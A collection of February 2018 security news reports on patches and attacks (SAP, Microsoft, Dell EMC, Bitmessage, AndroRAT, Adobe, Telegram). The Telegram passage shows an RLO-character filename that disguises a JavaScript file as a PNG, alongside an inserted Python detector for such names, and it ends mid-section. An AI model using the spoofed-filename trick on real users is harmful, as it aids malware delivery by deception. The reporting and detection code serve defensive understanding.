SAP Security Notes Feb 2018

SAP also updated previously released Security Notes, which include an incorrect authorization check in ERP Logistics, a cross-site request forgery (CSRF) vulnerability in SAP Sybase, and a flaw in the way SAP Note Assistant handles digitally signed notes.

Three critical vulnerabilities were reported by Mathieu Geli, Vahagn Vardanyan, and Vladimir Egorov, researchers at ERPScan security firm.

The details of the issues fixed thanks to the support of the researchers are:

A Missing Authentication check vulnerability in SAP NetWeaver System Landscape Directory (CVSS Base Score: 8.3, CVE-2018-2368). Update is available in SAP Security Note 2565622. An attacker can use the missing authorization check to access a service without any authorization procedure and use service functionality that has restricted access. This can lead to information disclosure, privilege escalation and other attacks.
A Directory Traversal vulnerability in SAP Internet Sales (CVSS Base Score: 6.6, CVE-2018-2380). Update is available in SAP Security Note 2547431. An attacker can use directory traversal to access arbitrary files and directories located in the SAP server file system, including application source code, configuration and system files. It allows an attacker to obtain critical technical and business-related information stored in a vulnerable SAP system.
An Information Disclosure vulnerability in SAP HANA (CVSS Base Score: 5.3, CVE-2018-2369). Update is available in SAP Security Note 2572940. An attacker can use the information disclosure vulnerability to reveal additional information (system data, debugging information, etc.) that helps to learn about a system and to plan other attacks.
The most severe vulnerability addressed by the security updates is a missing authentication check in SAP NetWeaver System Landscape Directory tracked as CVE-2018-2368, which received a CVSS base score of 8.3.

The flaw could be exploited by an attacker to access a service without any authorization, a circumstance that could lead to several attacks, including privilege escalation and information disclosure.

“A Missing Authentication check vulnerability in SAP NetWeaver System Landscape Directory (CVSS Base Score: 8.3 CVE-2018-2368). Update is available in SAP Security Note 2565622. An attacker can use Missing authorization check vulnerability for access to a service without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation and other attacks.” continues ERPScan.

The updates also addressed:

A Directory Traversal vulnerability in SAP Internet Sales (CVSS Base Score: 6.6, CVE-2018-2380) that could be exploited by an attacker to access arbitrary files and directories located in the SAP server file system, including application source code, configuration and system files.
An Information Disclosure vulnerability in SAP HANA (CVSS Base Score: 5.3, CVE-2018-2369) that could be exploited by an attacker to reveal additional information (system data, debugging information, etc.).
Other vulnerabilities addressed this month included a directory traversal (CVE-2018-2367) in SAP ABAP File Interface (CVSS base score: 6.6) and a directory traversal (CVE-2018-2380) in SAP Internet Sales (CVSS base score: 6.6).

Further information on the flaws addressed by SAP is available on the company blog.


SAP Resolves High Risk Flaws with February 2018 Patches
15.2.2018 securityweek
Vulnerebility
SAP this week released its monthly set of security updates for its products, addressing a total of 11 new vulnerabilities, including two considered high severity.

Adding the number of patches released after the second Tuesday of January and before the second Tuesday of this month, along with updates to previously released patches, totals 26 Security Notes (5 high-, 19 medium- and 2 low-risk).

The Security Notes SAP released as part of the February 2018 Security Patch Day fix three cross-site scripting (XSS) flaws, two directory traversal issues, two missing authorization checks, two information disclosure bugs, one unrestricted file upload, and four other vulnerabilities, SAP says in an advisory.

The 11 new notes impact Internet Graphics Server (IGS), NetWeaver System Landscape Directory, HANA Extended Application Services, ABAP File Interface, SAP CRM, ERP Financials Information System, Netweaver Portal, Netweaver Java Web Application, CRM WebClient UI, BI Launchpad, and SAP HANA.

The updates for previous Security Notes include an incorrect authorization check in ERP Logistics, a cross-site request forgery (CSRF) vulnerability in SAP Sybase, and an issue related to the handling of digitally signed notes in SAP Note Assistant.

When all of the Security Notes released since the second Tuesday of January are taken into consideration, missing authorization check emerges as the most common vulnerability type, with seven occurrences, followed by XSS at five. SAP also addressed four implementation flaws, three directory traversals, two SQL injections, one SSRF, one cross-site request forgery, and one denial-of-service.

The most severe of the issues is a missing authentication check in SAP NetWeaver System Landscape Directory (CVE-2018-2368), with a CVSS base score of 8.3. An attacker exploiting it could access a service without any authorization procedures, which could lead to information disclosure, privilege escalation and other attacks, explains ERPScan, a company specialized in securing SAP and Oracle products.

Another critical bug (CVE-2018-2395) addressed this month impacted SAP IGS, had a CVSS base score of 8.3, and consisted of several vulnerabilities: unrestricted file upload (CVE-2018-2395), DoS (CVE-2018-2394, CVE-2018-2396, CVE-2018-2391, CVE-2018-2390, CVE-2018-2386, CVE-2018-2385, CVE-2018-2384), XML external entity (XXE) (CVE-2018-2393, CVE-2018-2392), log injection (CVE-2018-2389), and information disclosure (CVE-2018-2382, CVE-2018-2387).

SAP also resolved several information disclosure bugs (CVSS base score: 7.1) in HANA Extended Application Services: CVE-2018-2374, CVE-2018-2375, CVE-2018-2376, CVE-2018-2379, CVE-2018-2377, CVE-2018-2372 and CVE-2018-2373. These could lead to sensitive data leaks, including HANA database usernames and passwords, reveals Onapsis, the company that reported the flaws.

“Two high Priority notes have been published in tandem this month (notes #1584573 and #1977547). These notes are a re-release of an old note published as far back as 2011. It concerns an SQL-injection vulnerability in the component BC-UPG,” Onapsis explains.

Other bugs addressed this month included a directory traversal (CVE-2018-2380) in SAP Internet Sales (CVSS base score: 6.6), a directory traversal (CVE-2018-2367) in SAP ABAP File Interface (CVSS base score: 6.6), and an information disclosure (CVE-2018-2369) in SAP HANA (CVSS base score: 5.3).


Nine Remotely Exploitable Vulnerabilities Found in Dell EMC Storage Platform
15.2.2018 securityweek
Vulnerebility
Nine remotely exploitable vulnerabilities have been found in Dell EMC's Isilon OneFS platform, a scale-out NAS storage platform that combines modular hardware with unified software to harness unstructured data.

"Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root," warns an advisory released today.

The vulnerabilities were discovered by researchers Ivan Huertas and Maximiliano Vidal from CoreLabs, the research center of Core Security, and disclosed to Dell in September 2017. A range of Isilon OneFS versions from 7.1.1.11 to 8.0.1.2 were found to be affected by two or more of the vulnerabilities. "Other products and versions might be affected, but they were not tested," states the advisory.

The Isilon web console contains several features that are vulnerable to cross-site request forgery. Since there are no anti-CSRF tokens in any forms on the web interface, an attacker can submit authenticated requests when an authenticated user browses an attacker-controlled domain. If social engineering can convince an authenticated user or administrator to visit a malicious website, embedded code could be executed to create a new user with elevated privileges, or execute arbitrary commands in the target system.

This is the first (CVE-2018-1213) of the nine vulnerabilities. Two privilege escalation vulnerabilities could then be used, once initial access has been achieved, to allow the attacker to run shell commands or arbitrary Python code with root privilege.

The first of these (CVE-2018-1203) is possible because of incorrect sudo permissions. "The compadmin user can run the tcpdump binary with root privileges via sudo," explains the advisory. "This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files."

The second (CVE-2018-1204) is privilege escalation via remote support scripts. "As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo," explain the researchers. "This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges."

The remaining six vulnerabilities are persistent cross-site scripting errors: in the cluster description; the Network Configuration page; the Authentication Providers page; the Antivirus page; the Job Operations page; and the NDMP page.

All nine vulnerabilities were responsibly disclosed to Dell EMC on 25 September 2017. At first (about one month later), Dell proposed an update schedule extending into June 2018. CoreLabs replied that this was unacceptable "given current industry standards."

Dell reviewed its schedules, and confirmed that they would have a fix available by February 12, 2018. The two parties agreed to release details of the vulnerabilities and fixes on February 14. Dell's fixes are available from its support site today. Dell's own advisory will be posted to the Full Disclosure mailing list today. It had not been done at the time of writing this article.

Dell completed the acquisition of data storage firm EMC in September 2016 in a record $67 billion deal. In the same deal, Dell also acquired RSA.

Core Security merged with SecureAuth and raised more than $200 million from K1 Investment Management and Toba Capital in September 2017.


Microsoft Patch Tuesday for February 2018 addresses 14 critical flaws
14.2.2018 securityaffairs
Vulnerebility

Microsoft Patch Tuesday for February 2018 addressed a total of 50 vulnerabilities affecting the Windows operating system, Microsoft Office, web browsers and other products of the tech giant.
Fourteen issues are listed as critical, 34 are rated as important, and only two of them are rated as moderate in severity.

The list of critical vulnerabilities includes an information disclosure issue in the Edge browser, a remote code execution vulnerability in the Windows StructuredQuery component, a memory corruption in Outlook, and several memory corruption flaws in the scripting engines used by both Edge and Internet Explorer.

One of the most severe vulnerabilities addressed by the Microsoft Patch Tuesday for February 2018 is a memory corruption flaw tracked as CVE-2018-0852 that affects Microsoft Outlook. The flaw could be exploited to achieve remote code execution on the targeted machines.

“A remote code execution vulnerability exists in Microsoft Outlook when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”

In order to trigger the flaw, an attacker can trick the victim into opening a specially crafted message attachment or viewing it in the Outlook Preview Pane: yes, simply viewing an email in the Preview Pane could allow code execution.

“Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability.” continues the advisory.

Microsoft Patch Tuesday for February 2018

Another vulnerability affecting Outlook and addressed with the Microsoft Patch Tuesday for February 2018 is a privilege escalation issue tracked as CVE-2018-0850. The vulnerability is rated as important and can be exploited by an attacker by sending a specially crafted email to an Outlook user. Exploitation doesn't require any user action: the flaw is triggered when the message is merely received.

“An attacker who successfully exploited the vulnerability could attempt to force Outlook to load a local or remote message store (over SMB).” states the advisory published by Microsoft.

“To exploit the vulnerability, the attacker could send a specially crafted email to a victim. Outlook would then attempt to open a pre-configured message store contained in the email upon receipt of the email.”

Another critical flaw fixed by Microsoft is an information disclosure vulnerability (CVE-2018-0763) that affects Microsoft Edge. The vulnerability stems from the way Microsoft Edge improperly handles objects in memory.

An attacker can trigger the flaw to obtain sensitive information that helps compromise the target machine, but in this case exploitation requires user interaction.

“An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.” states the advisory published by Microsoft.

“To exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action.”

Let’s close with another issue fixed by Microsoft, CVE-2018-0771, which affects Microsoft Edge and was publicly known before Microsoft released the patch.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.” states Microsoft.

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.”

Users have to apply security patches as soon as possible.


Zero-Day Attack Prompts Emergency Patch for Bitmessage Client
14.2.2018 securityweek
Vulnerebility
An emergency update released on Tuesday for the PyBitmessage application patches a critical remote code execution vulnerability that has been exploited in attacks.

Bitmessage is a decentralized and trustless communications protocol that can be used for sending encrypted messages to one or multiple users. PyBitmessage is the official client for Bitmessage.

Bitmessage developers have issued a warning for a zero-day flaw that has been exploited against some users running PyBitmessage 0.6.2.

The security hole, described as a message encoding bug, has been patched with the release of version 0.6.3.2, but since PyBitmessage 0.6.1 is not affected by the flaw, downgrading is also an option for mitigating potential attacks.

Code patches were released on Tuesday, and binary files for Windows and macOS are expected to become available on Wednesday.

One of the individuals targeted in the zero-day attacks was Bitmessage core developer Peter Šurda. The developer told users not to contact him on his old address and admitted that his keys were most likely compromised. A new support address has been added to PyBitmessage 0.6.3.2.

“If you have a suspicion that your computer was compromised, please change all your passwords and create new bitmessage keys,” Šurda said.

According to Šurda, the attacker exploited the vulnerability in an effort to create a remote shell and steal bitcoins from Electrum wallets.

“The exploit is triggered by a malicious message if you're the recipient (including joined chans),” the developer explained. “The attacker ran an automated script but also opened, or tried to open, a remote reverse shell. The automated script looked in ~/.electrum/wallets, but when using the reverse shell he had access to other files as well.”

The investigation into these attacks is ongoing and Bitmessage developers have promised to share more information as it becomes available.

Bitmessage has become increasingly popular in the past years following reports that the U.S. National Security Agency and other intelligence agencies are conducting mass surveillance. While the protocol is often used by people looking to protect their privacy, it has also been leveraged by cybercriminals, including in ransomware attacks for communications between victims and the hackers.


New AndroRAT Variant Emerges
14.2.2018 securityweek
Vulnerebility  Virus
A newly discovered variant of the AndroRAT off-the-shelf mobile malware can inject root exploits to perform malicious tasks, Trend Micro reports.

The updated malware version targets CVE-2015-1805, a publicly disclosed vulnerability that can be abused to achieve privilege escalation on older Android devices. By injecting root exploits, the threat can perform silent installation, shell command execution, WiFi password collection, and screen capture, security researchers have discovered.

First observed in 2012, AndroRAT was initially a university project, designed as an open-source client/server application to offer remote control of a device. It didn’t take long for cybercriminals to find the tool appealing and start using it in attacks.

Like other Remote Access Tools (RATs), the malware gains root access in order to take control of the target system.

The newly observed version of the tool masquerades as a utility app called TrashCleaner, which the researchers believe is delivered from a malicious URL. When first executed, TrashCleaner prompts the user to install a Chinese-labeled calculator app, hides its icon from the device’s UI, and activates the RAT in the background.

“The configurable RAT service is controlled by a remote server, which could mean that commands may be issued to trigger different actions. The variant activates the embedded root exploit when executing privileged actions,” Trend Micro notes.

The malware can perform a broad range of actions previously observed in the original AndroRAT, including audio recording, photo taking, and system information theft (phone model, number, IMEI, etc.). It also steals WiFi names, call logs, mobile network cell location, GPS location, contacts, files on the device, list of running apps, and SMS messages, while keeping an eye on all incoming and outgoing SMS.

The threat is also capable of obtaining mobile network information, storage capacity, root status, list of installed applications, web browsing history from pre-installed browsers, and calendar events. Additionally, it can record calls, upload files to the device, capture photos using the front camera, delete and send forged SMS messages, take screenshots, execute shell commands, steal WiFi passwords, and silently enable accessibility services for a keylogger.

While the targeted vulnerability (CVE-2015-1805) was patched in early 2016, devices that are no longer updated regularly continue to be exposed to this new AndroRAT variant.

To avoid being targeted by the threat, users should avoid downloading and installing applications from third-party app stores. Installing the latest security updates and keeping all applications on the device updated at all times should also reduce the risk of being affected, the security researchers point out.


Adobe Patches 39 Vulnerabilities in Acrobat and Reader
14.2.2018 securityweek
Vulnerebility
Updates released on Tuesday by Adobe for its Acrobat, Acrobat Reader and Experience Manager products patch more than 40 vulnerabilities, but none of them appear to have been exploited for malicious purposes.

The company fixed a total of 39 flaws in its Acrobat and Reader products for Windows and Mac. The security holes, rated important and critical with a priority rating of 2, have been described as security mitigation bypass, heap overflow, use-after-free, out-of-bounds read, and out-of-bounds write weaknesses that can be exploited for privilege escalation or arbitrary code execution.

The flaws impact version 2018.009.20050 and earlier of Acrobat DC Continuous Track, version 2017.011.30070 and earlier of Acrobat 2017, and versions 2015.006.30394 and earlier of Acrobat DC Classic Track.

More than half of the vulnerabilities were reported to Adobe by employees of China-based Tencent. The disclosure was often made through Trend Micro’s Zero Day Initiative (ZDI).

As for Experience Manager, the latest version of the enterprise content management solution patches two vulnerabilities, including a reflected cross-site scripting (XSS) issue rated moderate, and an important XSS in the Apache Sling XSS protection API.

According to Adobe, exploitation of these flaws could allow attackers to obtain sensitive information. The company has not credited anyone for the Experience Manager security holes.

Earlier this month, Adobe issued an emergency update for Flash Player after learning that threat actors believed to be working on behalf of North Korea had been exploiting a zero-day vulnerability in attacks aimed at South Korea.

The group believed to be behind the attacks is tracked by FireEye as “TEMP.Reaper” and by Cisco Talos as “Group 123.”


Microsoft Patches 50 Flaws in Windows, Office, Browsers
14.2.2018 securityweek
Vulnerebility
Microsoft’s Patch Tuesday updates for February 2018 address 50 vulnerabilities in Windows, Office and the company’s web browsers, but this time the list does not appear to include any zero-day flaws.

Fourteen of the security holes have been rated critical, including an information disclosure flaw in Edge, a memory corruption in Outlook, a remote code execution vulnerability in Windows’ StructuredQuery component, and several memory corruptions in the scripting engines used by Edge and Internet Explorer.

One vulnerability, CVE-2018-0771, was publicly disclosed before Microsoft released patches. The issue is a Same-Origin Policy (SOP) bypass that exists due to the way Edge handles requests of different origins.

“An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted,” Microsoft said. The company believes it’s unlikely that this flaw, which it has rated “important,” will be exploited in attacks.

Two of the most interesting issues patched this month are Outlook vulnerabilities discovered by Microsoft’s own Nicolas Joly. One of the flaws, CVE-2018-0852, can be exploited to execute arbitrary code in the context of a user’s session by getting the target to open a specially crafted file with an affected version of Outlook.

“What’s truly frightening with this bug is that the Preview Pane is an attack vector, which means simply viewing an email in the Preview Pane could allow code execution,” explained Dustin Childs of the Zero Day Initiative (ZDI). “The end user targeted by such an attack doesn’t need to open or click on anything in the email – just view it in the Preview Pane. If this bug turns into active exploits – and with this attack vector, exploit writers will certainly try – unpatched systems will definitely suffer.”

The second Outlook vulnerability found by Joly is a privilege escalation issue (CVE-2018-0850) that can be leveraged to force Outlook to load a local or remote message store. The flaw can be exploited by sending a specially crafted email to an Outlook user.

“The email would need to be fashioned in a manner that forces Outlook to load a message store over SMB. Outlook attempts to open the pre-configured message on receipt of the email. You read that right – not viewing, not previewing, but upon receipt. That means there’s a potential for an attacker to exploit this merely by sending an email,” Childs said, pointing out that such a vulnerability would have earned Joly a prize in ZDI’s Pwn2Own competition.

Microsoft’s Patch Tuesday updates fix a total of 34 important and two moderate severity vulnerabilities.

Earlier this month, Microsoft updated the Adobe Flash Player components used by its products to address two vulnerabilities, including a zero-day believed to have been exploited by North Korean threat actors. Adobe on Tuesday released updates for its Acrobat, Reader and Experience Manager products to address 41 security bugs.


Zero-day vulnerability in Telegram

13.2.2018 Kaspersky  Vulnerebility
Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell
The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.


Mikko Hypponen
@mikko
New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… http://www.f-secure.com/weblog/archives/00002576.html …

15:52 - 15 Jul 2013
Launching an attack on Telegram
Below is an account of how this vulnerability was exploited in Telegram:

The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:
evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

When the user clicks on this file, the standard Windows security notification is displayed:

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.
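The spoofing described in the steps above keys on the U+202E control character, not on right-to-left script, so a defender can flag it deterministically. The following is an added example (not Kaspersky's or Telegram's code) that detects bidi override characters in attachment names, reconstructs the name a vulnerable UI would display, and compares the displayed extension with the one the OS actually dispatches on; the sample attachment names are constructed for the example.

```python
"""Detect right-to-left override (RLO) filename spoofing.

Added example, not code from the original article. It models the simple
rendering a vulnerable client performs: every U+202E reverses the characters
that follow it up to the next U+202C (pop directional formatting) or the end
of the string. Nested or mixed embeddings are deliberately not modelled.
"""
import os
from typing import List, NamedTuple

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE, the character abused in the attack
PDF = "\u202c"  # POP DIRECTIONAL FORMATTING, terminates an override

# Unicode bidi control characters; none of them belong in a filename.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"  # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"        # LRI, RLI, FSI, PDI
    "\u200e\u200f"                    # LRM, RLM
)


class RloFinding(NamedTuple):
    filename: str         # raw name as stored / sent in the message
    displayed: str        # what a renderer honouring the RLO shows
    real_extension: str   # extension the OS dispatches on (e.g. ".js")
    shown_extension: str  # extension the user believes they see
    suspicious: bool      # any bidi control present in the name
    extension_mismatch: bool


def has_bidi_controls(name: str) -> bool:
    return any(ch in BIDI_CONTROLS for ch in name)


def strip_bidi_controls(name: str) -> str:
    """Safe display form: drop the controls so the real extension is visible."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def render_with_rlo(name: str) -> str:
    """Approximate how a vulnerable UI displays `name`."""
    out: List[str] = []
    i = 0
    while i < len(name):
        if name[i] == RLO:
            j = name.find(PDF, i + 1)
            end = len(name) if j == -1 else j
            out.append(name[i + 1:end][::-1])  # reversed run after the RLO
            i = end + 1 if j != -1 else end    # skip the PDF terminator too
            continue
        out.append(name[i])
        i += 1
    return "".join(out)


def _extension(name: str) -> str:
    return os.path.splitext(name)[1].lower()


def analyse_filename(name: str) -> RloFinding:
    displayed = render_with_rlo(name)
    real_ext = _extension(strip_bidi_controls(name))
    shown_ext = _extension(displayed)
    return RloFinding(
        filename=name,
        displayed=displayed,
        real_extension=real_ext,
        shown_extension=shown_ext,
        suspicious=has_bidi_controls(name),
        extension_mismatch=real_ext != shown_ext,
    )


def scan_attachments(names: List[str]) -> List[RloFinding]:
    """Return findings for every attachment name that carries a bidi control."""
    return [f for f in map(analyse_filename, names) if f.suspicious]


# Constructed sample: the article's example, a second override that uses a
# PDF terminator, a genuine Arabic filename (RTL script, no override) and a
# plain image. Only the first two should be flagged.
SAMPLE_ATTACHMENTS = [
    "photo_high_re\u202egnp.js",
    "report\u202efdp.\u202cexe",
    "\u0645\u0644\u0641.pdf",
    "holiday.png",
]

if __name__ == "__main__":
    for finding in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{finding.displayed!r} is really {finding.real_extension} "
              f"(safe name: {strip_bidi_controls(finding.filename)!r})")
```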

Exploitation in the wild
After learning of the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control
This sort of attack aims to take control of the victim’s system, and involves the attacker studying the target system’s environment and installing additional modules.

At the first stage, a downloader written in .NET, which uses the Telegram API as its command protocol, is sent to the target:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies a startup registry key to achieve persistence on the system and copies its executable file into one of several directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below: